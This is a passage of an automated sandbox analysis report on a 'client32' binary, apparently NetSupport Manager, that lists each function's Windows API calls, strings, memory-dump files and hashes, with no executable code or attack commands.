                                                                                                Function 1111F440 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                • DeleteObject.GDI32(?), ref: 1111F516
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteObject$PaletteSelect
                                                                                                • String ID:
                                                                                                • API String ID: 2820294704-0
                                                                                                • Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                                • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                                                • Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                                • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                                                Function 1104F179 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 69sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                                  • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                                  • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                                                • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                                                • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                                                • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                                                • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                                                Strings
                                                                                                • Global\Client32Provider, xrefs: 1104F1BB
                                                                                                • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                                                • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                                                • API String ID: 3682529815-1899068400
                                                                                                • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                                • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                                                • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                                • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                                                Function 69D06CFE Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 69D06D0A
                                                                                                  • Part of subcall function 69D06F64: __getptd_noexit.LIBCMT ref: 69D06F67
                                                                                                  • Part of subcall function 69D06F64: __amsg_exit.LIBCMT ref: 69D06F74
                                                                                                • __getptd.LIBCMT ref: 69D06D21
                                                                                                • __amsg_exit.LIBCMT ref: 69D06D2F
                                                                                                • __lock.LIBCMT ref: 69D06D3F
                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 69D06D53
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                • String ID:
                                                                                                • API String ID: 938513278-0
                                                                                                • Opcode ID: d01c1a0d499d0c4417f3703d9408c392d52ccd232d849257e87f0c2911aba619
                                                                                                • Instruction ID: 46d77a3f85c72f1142d1906318cee75589c573cbabe8e6ebaaed479379baf8d6
                                                                                                • Opcode Fuzzy Hash: d01c1a0d499d0c4417f3703d9408c392d52ccd232d849257e87f0c2911aba619
                                                                                                • Instruction Fuzzy Hash: 23F09036904710DAEA11EF68442178E37A0BF00B28F90D73DFA54A7EC0CB249980DA79
                                                                                                Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 11171312
                                                                                                  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                                  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                                • __getptd.LIBCMT ref: 11171329
                                                                                                • __amsg_exit.LIBCMT ref: 11171337
                                                                                                • __lock.LIBCMT ref: 11171347
                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                • String ID:
                                                                                                • API String ID: 938513278-0
                                                                                                • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                                • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                                                • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                                • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                                                Function 11053280 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                  • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E,00000000,00000000,?,110CCCA0,00000000,110314FA,00000104), ref: 1114542A
                                                                                                  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                                  • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                                  • Part of subcall function 110CC360: MapWindowPoints.USER32 ref: 110CC39C
                                                                                                  • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                                  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                                  • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                                  • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                                  • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                                                • std::exception::exception.LIBCMT ref: 11053483
                                                                                                • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                • API String ID: 2181554437-3415836059
                                                                                                • Opcode ID: a6b0480843f53e02530e0c60f3bcb335d2d4984fd15d6a9e6fe082baa2b0fdfd
                                                                                                • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                                                • Opcode Fuzzy Hash: a6b0480843f53e02530e0c60f3bcb335d2d4984fd15d6a9e6fe082baa2b0fdfd
                                                                                                • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                                                Function 11067090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 110670A8
                                                                                                • GetTickCount.KERNEL32(General,TicklePeriod,00000012,00000000), ref: 110671F0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick
                                                                                                • String ID: General$TicklePeriod
                                                                                                • API String ID: 536389180-1546705386
                                                                                                • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                                • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                                                • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                                • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                                                Function 69CF0C40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69CF0D9C
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF0DB1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID: DATA$NAME
                                                                                                • API String ID: 1338273076-4000142801
                                                                                                • Opcode ID: 23829fd0a33833938399c33cf73ee38230833c174df6067d0bce1f53c7f66f76
                                                                                                • Instruction ID: 8f3d3847cdc7c5671966e2a18fe43574b718698dd3a48d6d9a9aebccd3ce3e1f
                                                                                                • Opcode Fuzzy Hash: 23829fd0a33833938399c33cf73ee38230833c174df6067d0bce1f53c7f66f76
                                                                                                • Instruction Fuzzy Hash: 8D41F7B5C002499FDF54DFE4D880AEEBBB4FF08614F50853EE926A7640E7345A06CB91
                                                                                                Function 69CF6170 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF619F
                                                                                                  • Part of subcall function 69CF33A0: wsprintfA.USER32 ref: 69CF34FD
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CF7B60: _sprintf.LIBCMT ref: 69CF7B77
                                                                                                  • Part of subcall function 69CF77E0: _free.LIBCMT ref: 69CF77EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __vswprintf_free_memset_sprintfwsprintf
                                                                                                • String ID: CMD=CONTROL_SEND_PIN$PIN=%s$PINserver
                                                                                                • API String ID: 2968883096-3759296614
                                                                                                • Opcode ID: f4f86adb840a4f2aad9963c1ea392d88c73b72205403e47304781aa05f23c799
                                                                                                • Instruction ID: 61d15e9d1e25253233c44e348ef9370dad700e4c93fd98994b35e5cb152731db
                                                                                                • Opcode Fuzzy Hash: f4f86adb840a4f2aad9963c1ea392d88c73b72205403e47304781aa05f23c799
                                                                                                • Instruction Fuzzy Hash: 29314576D10118AADB64DB74DC41FDEB7B8AB44314F40C2D9E60DE7181EE305A898B60
                                                                                                Function 69CE6CAD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable,00000000,000000C8,756F11C0,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D0A
                                                                                                • GetProcAddress.KERNEL32(?,InternetReadFile,?,69CEB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 69CE6D72
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                • API String ID: 190572456-1434219782
                                                                                                • Opcode ID: 20cb8756c2b06c9c184e035f1a9f9102ef14d4e2ff3d99559f685ad3814e9384
                                                                                                • Instruction ID: 9b4de76f96d6d7a3585f3ed10674baba21c29ce5338254265ea712b7813a8280
                                                                                                • Opcode Fuzzy Hash: 20cb8756c2b06c9c184e035f1a9f9102ef14d4e2ff3d99559f685ad3814e9384
                                                                                                • Instruction Fuzzy Hash: 783119769001A59FEB21DF68CDD0B99B7F4FF49345B5089B9E689D7200D270AAC4CF10
                                                                                                Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 110D1378
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                • API String ID: 1528188558-323366856
                                                                                                • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                                • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                                                • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                                • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                                                Function 69CF7970 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • #16.WSOCK32(?,?,?,00000000), ref: 69CF79F1
                                                                                                • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 69CF7A16
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID: hbuf->data$httputil.c
                                                                                                • API String ID: 1452528299-2732665889
